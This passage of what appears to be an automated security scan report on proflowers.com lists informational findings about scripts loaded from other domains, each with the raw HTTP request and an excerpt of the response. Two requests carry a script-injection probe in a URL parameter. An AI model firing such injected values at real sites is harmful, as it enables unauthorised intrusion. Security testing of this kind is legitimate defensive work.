horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
17.2. https://accounts.proflowers.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
17.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:25 GMT
Content-Length: 62175


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="SectionContainer">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="LargeMiscColumn">
   
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessagepreview.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:52 GMT
Content-Length: 46799


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
